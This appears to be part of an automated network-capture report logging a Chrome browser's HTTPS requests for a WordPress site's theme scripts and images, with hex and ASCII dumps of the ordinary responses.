                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 67 65 2d 69 74 65 6d 2d 27 29 20 3e 3d 20 30 20 29 0a 09 09 09 09 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 09 09 09 09 6e 65 77 5f 6c 69 2e 61 64 64 43 6c 61 73 73 28 76 61 6c 75 65 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 0a 09 09 09 09 09 61 70 70 65 6e 64 5f 74 6f 2e 61 70 70 65 6e 64 28 6e 65 77 5f 6c 69 29 3b 0a 09 09 09 09 09 0a 09 09 09 09 09 69 66 28 73 75 62 69 74 65 6d 73 2e 6c 65 6e 67 74 68 29 0a 09 09 09 09 09 7b 0a 09 09 09 09 09 09 6e 65 77 5f 75 6c 20 3d 20 24 28 27 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 27 29 2e 61 70 70 65 6e 64 54 6f 28 6e 65 77 5f 6c 69 29 3b
                                                                                                                                              Data Ascii: ge-item-') >= 0 ){new_li.addClass(value);return false;}});}append_to.append(new_li);if(subitems.length){new_ul = $('<ul class="sub-menu">').appendTo(new_li);
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: 6f 72 6d 2e 61 74 74 72 28 27 64 61 74 61 2d 72 65 73 75 6c 74 73 5f 73 74 79 6c 65 27 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 75 6c 74 73 5f 63 73 73 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 72 65 73 75 6c 74 73 5f 63 73 73 2c 20 72 65 73 75 6c 74 73 5f 73 74 79 6c 65 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 61 64 64 20 63 6c 61 73 73 20 69 66 20 66 6f 6e 74 20 63 6f 6c 6f 72 20 69 73 20 61 70 70 6c 69 65 64 2c 20 73 6f 20 77 65 20 63 61 6e 20 75 73 65 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 22 63 6f 6c 6f 72 22 20 69 6e 20 72 65 73 75 6c 74 73 5f 63 73 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                              Data Ascii: orm.attr('data-results_style')); results_css = Object.assign(results_css, results_style); // add class if font color is applied, so we can use color: inherit if ("color" in results_css) {
                                                                                                                                              2025-01-03 16:33:03 UTC4846INData Raw: 66 20 64 3f 64 3d 64 2e 61 70 70 6c 79 28 63 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 64 26 26 28 64 3d 70 61 72 73 65 46 6c 6f 61 74 28 64 29 2c 63 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 2e 69 6e 64 65 78 4f 66 28 22 25 22 29 3e 2d 31 26 26 28 64 3d 4d 61 74 68 2e 63 65 69 6c 28 72 2e 63 6f 6e 74 65 78 74 44 69 6d 65 6e 73 69 6f 6e 2a 64 2f 31 30 30 29 29 29 2c 61 3d 72 2e 63 6f 6e 74 65 78 74 53 63 72 6f 6c 6c 2d 72 2e 63 6f 6e 74 65 78 74 4f 66 66 73 65 74 2c 63 2e 74 72 69 67 67 65 72 50 6f 69 6e 74 3d 77 2b 61 2d 64 2c 6c 3d 66 3c 72 2e 6f 6c 64 53 63 72 6f 6c 6c 2c 68 3d 63 2e 74 72 69 67 67 65 72 50 6f 69 6e 74 3e 3d 72 2e 6f 6c 64 53 63 72 6f 6c 6c 2c 70 3d 6c 26 26 68 2c 75 3d 21 6c 26 26 21 68 2c 21 79 26 26 70 3f 28 63 2e
                                                                                                                                              Data Ascii: f d?d=d.apply(c):"string"==typeof d&&(d=parseFloat(d),c.options.offset.indexOf("%")>-1&&(d=Math.ceil(r.contextDimension*d/100))),a=r.contextScroll-r.contextOffset,c.triggerPoint=w+a-d,l=f<r.oldScroll,h=c.triggerPoint>=r.oldScroll,p=l&&h,u=!l&&!h,!y&&p?(c.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              84192.168.2.164981289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC632OUTGET /wp-content/uploads/2019/05/Cipasso_simbolo3.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:03 UTC271INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 25096
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Tue, 28 May 2019 12:42:53 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC16113INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 4d 00 00 00 32 08 06 00 00 00 d8 f3 89 64 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a ac 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da ad 96 77 54 93 59 1a c6 df ef fb d2 0b 2d 21 02 52 42 6f 82 14 e9 d2 6b e8 d2 c1 46 48 20 09 84 18 42 82 8a a8 a8 0c 8e e0 58 10 11 01 65 44 46 44 14 1c 0b 20 63 41 2c 58 18 04 7b 1f 90 41 45 5d 07 0b 36 54 f6 0f 96 b0 7b 76 f7 8f 3d 67 df 73 ee 39 bf f3 9c 7b 9f fb be f7 fe f3 00 d0 4e 72 a5 52 31 aa 06 90 2d 91 cb 62 82 fd d8 49 c9 29 6c e2 10 20 80 01 80 15 90 b8 bc 5c a9 6f 74 74 38 fc d7 fa 70 1b 10 00 80 1b 36 5c a9 54 0c ff 5b a9 f3 d3 73 79 00 48 34 00 a4 f1 73 79 d9 00 c8 31 00 a4 9e 27 95
                                                                                                                                              Data Ascii: PNGIHDRM2dpHYsiCCPPhotoshop ICC profilexwTY-!RBokFH BXeDFD cA,X{AE]6T{v=gs9{NrR1-bI)l \ott8p6\T[syH4sy1'
                                                                                                                                              2025-01-03 16:33:03 UTC8983INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                              Data Ascii:


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              85192.168.2.164981389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC460OUTGET /wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:03 UTC271INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 17383
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sun, 11 Sep 2022 14:56:05 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC16113INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 8f 08 06 00 00 00 40 82 e6 81 00 00 43 ae 49 44 41 54 78 da ed 7d 77 9c 24 65 9d fe 53 d5 69 f2 cc ce ec ce d6 e6 cc 2e 4b 58 72 94 06 01 13 8a e1 94 13 13 66 4f 4f 69 cf 43 d1 3b bd 3b d3 cf ec 89 73 de 9d 8a 9e 62 46 d1 23 88 91 20 23 59 16 58 60 03 b0 39 f6 ee cc ec ce 4e 9e 4e f5 fb e3 fb bc 57 ef 34 55 1d aa bb 67 7a b1 be 9f 4f 7f 26 f5 54 57 bd e1 f9 3e df f8 02 81 04 12 48 20 81 04 12 48 20 81 04 12 48 20 81 fc 95 8a 11 0c 41 20 81 3c ff 25 11 b7 0c 00 21 00 26 7f 65 03 c8 02 c8 f5 f4 26 03 c0 0a 24 90 40 6a 02 3c 20 e8 18 2e 2f 93 af 10 5f 61 00 0d 00 da 01 74 01 98 0f a0 8d ef 4d 03 48 02 38 0c 60 02 c0 24 5f 13 fc db 04 80 0c 80 f1 9e de a4 5d 2f cf 1f 0e 96 40 20 81 1c 13 40
                                                                                                                                              Data Ascii: PNGIHDR,@CIDATx}w$eSi.KXrfOOiC;;sbF# #YX`9NNW4UgzO&TW>H H H A <%!&e&$@j< ./_atMH8`$_]/@ @
                                                                                                                                              2025-01-03 16:33:03 UTC1270INData Raw: 73 35 cd c2 10 9c 8e 9b 06 37 d3 78 19 8c 5b f7 57 95 6b ce e7 e8 9a f8 37 48 bd dd 84 07 98 44 30 35 67 6f 92 a6 e3 c9 45 d6 e9 30 41 f0 4b 00 f6 ce 90 83 3d 06 a7 b3 6e 8a cf 3b 42 c0 0d 91 24 1c a4 32 7a 11 4d f1 0c a4 de b7 1c c5 34 48 df 9f 5b 7f fe 11 38 07 8e 1c bb 80 a5 f9 b5 32 89 b8 f5 34 27 f6 46 88 13 f3 4a 88 c3 dd 4f be 54 16 de b9 2d ea 4c 35 14 60 5f a5 4e 94 da 24 8a e9 a9 5e e5 bb 20 91 c2 63 39 d3 dd d0 98 6c 23 7d 35 06 9c 13 5a aa 75 02 74 03 a6 1e c0 d9 4f c6 73 ba 0f 5f 98 52 42 03 dc 9c 85 4a 7b 86 34 13 f0 b1 22 fd c4 43 79 73 d9 44 16 1a 2a e0 07 7c 1a 92 c3 75 23 6a d7 15 b6 14 49 42 82 19 07 38 77 bf e3 cf e7 d3 04 4c 42 4a 6e 96 72 ae 57 6b ca fe 20 9f b5 58 b3 00 55 4a d5 50 40 31 4c 5b 62 ec b4 e4 12 69 f5 4e 5b 21 0d df 6e
                                                                                                                                              Data Ascii: s57x[Wk7HD05goE0AK=n;B$2zM4H[824'FJOT-L5`_N$^ c9l#}5ZutOs_RBJ{4"CysD*|u#jIB8wLBJnrWk XUJP@1L[biN[!n


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              86192.168.2.164981489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC680OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:03 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2080
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC2080INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 50 6c 61 79 65 72 0a 2f 2f 20 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 76 61 72 20 61 75 74 6f
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA Player// // -------------------------------------------------------------------------------------------(function($){ "use strict";var auto


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              87192.168.2.164981589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC670OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:03 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 7813
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC7813INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 61 6a 61 78 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 09 24 2e 66 6e 2e 61 76 69 61 5f 61 6a 61 78 5f 66 6f 72 6d 20 3d 20 66 75 6e 63 74
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// contact form ajax// -------------------------------------------------------------------------------------------(function($){$.fn.avia_ajax_form = funct


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              88192.168.2.164981789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC674OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:03 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 31458
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC16107INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 76 69 61 20 53 6c 69 64 65 73 68 6f 77 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Avia Slideshow======================================================================================
                                                                                                                                              2025-01-03 16:33:03 UTC15351INData Raw: 09 63 75 72 72 65 6e 74 09 09 09 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 24 73 6c 69 64 65 72 55 6c 2e 68 65 69 67 68 74 28 29 29 2c 0a 09 09 09 09 72 61 74 69 6f 09 09 09 3d 20 73 6c 69 64 65 2e 64 61 74 61 28 27 76 69 64 65 6f 2d 72 61 74 69 6f 27 29 2c 0a 09 09 09 09 73 65 74 54 6f 20 20 20 09 09 3d 20 72 61 74 69 6f 20 3f 20 74 68 69 73 2e 24 73 6c 69 64 65 72 55 6c 2e 77 69 64 74 68 28 29 20 2f 20 72 61 74 69 6f 20 3a 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 73 6c 69 64 65 2e 68 65 69 67 68 74 28 29 29 2c 0a 09 09 09 09 76 69 64 65 6f 5f 68 65 69 67 68 74 20 09 3d 20 73 6c 69 64 65 2e 64 61 74 61 28 27 76 69 64 65 6f 2d 68 65 69 67 68 74 27 29 2c 20 2f 2f 66 6f 72 63 65 64 20 76 69 64 65 6f 20 68 65 69 67 68 74 20 25 2e 20 6e 65 65 64 73 20
                                                                                                                                              Data Ascii: current= Math.floor(this.$sliderUl.height()),ratio= slide.data('video-ratio'),setTo = ratio ? this.$sliderUl.width() / ratio : Math.floor(slide.height()),video_height = slide.data('video-height'), //forced video height %. needs


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              89192.168.2.164981889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC449OUTGET /wp-content/uploads/2021/06/CiPASSO-Home-1500x630.jpg HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:03 UTC273INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                              Content-Length: 835036
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sat, 19 Jun 2021 08:45:52 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:03 UTC16111INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 c0 00 c0 00 00 ff e2 02 64 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 54 6c 63 6d 73 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e5 00 06 00 13 00 08 00 14 00 02 61 63 73 70 4d 53 46 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 6c 63 6d 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 64 65 73 63 00 00 01 08 00 00 00 3e 63 70 72 74 00 00 01 48 00 00 00 4c 77 74 70 74 00 00 01 94 00 00 00 14 63 68 61 64 00 00 01 a8 00 00 00 2c 72 58 59 5a 00 00 01 d4 00 00 00 14 62 58 59 5a 00 00 01 e8 00 00 00 14 67 58 59 5a 00 00 01 fc 00 00 00 14 72
                                                                                                                                              Data Ascii: JFIFdICC_PROFILETlcms0mntrRGB XYZ acspMSFT-lcmsdesc>cprtHLwtptchad,rXYZbXYZgXYZr
                                                                                                                                              2025-01-03 16:33:03 UTC16384INData Raw: d7 76 2f af 3f 05 be 83 fc 58 68 d2 c7 83 de 1a 06 a5 d9 d9 da a6 7e 10 92 07 58 f5 5d 47 0f 46 ee 0d 39 66 b1 2f c8 1a a0 59 82 35 ac 6e 5d 95 43 2d f5 83 97 28 ca 4c f9 53 82 54 b4 49 c4 a1 40 80 41 12 e5 95 4b 24 6a a2 47 89 4f 99 41 21 d9 88 8c 6f 0b c6 cf e1 7c 45 66 42 cc a2 91 39 04 87 b0 cb 91 44 3e 52 a4 82 58 90 59 cd 18 c5 88 f8 f3 f8 d6 f5 af e1 83 b7 bd 1f 3d 9b df fa e6 91 89 dd 38 19 cb 9d b7 2b e6 09 57 03 07 4c 95 16 36 c8 49 a4 8d 54 64 bd 08 8a 11 62 a8 8e 63 60 f0 bc 5a 6a d5 87 95 c5 f8 a4 a9 46 42 16 99 28 c6 cd 09 40 28 04 25 01 ce 54 87 a2 6a c1 87 4d 37 66 d7 81 c7 e3 71 73 f1 dc 37 01 8e 52 24 19 ea 5e 27 0c 89 81 4b ef 00 25 62 89 57 86 84 b5 cd 5c c7 2f 3d 11 f8 ac ef 7f 88 ff 00 8c 6f 47 87 75 f7 36 b9 dc 12 ae a5 97 27 cc d5
                                                                                                                                              Data Ascii: v/?Xh~X]GF9f/Y5n]C-(LSTI@AK$jGOA!o|EfB9D>RXY=8+WL6ITdbc`ZjFB(@(%TjM7fqs7R$^'K%bW\/=oGu6'
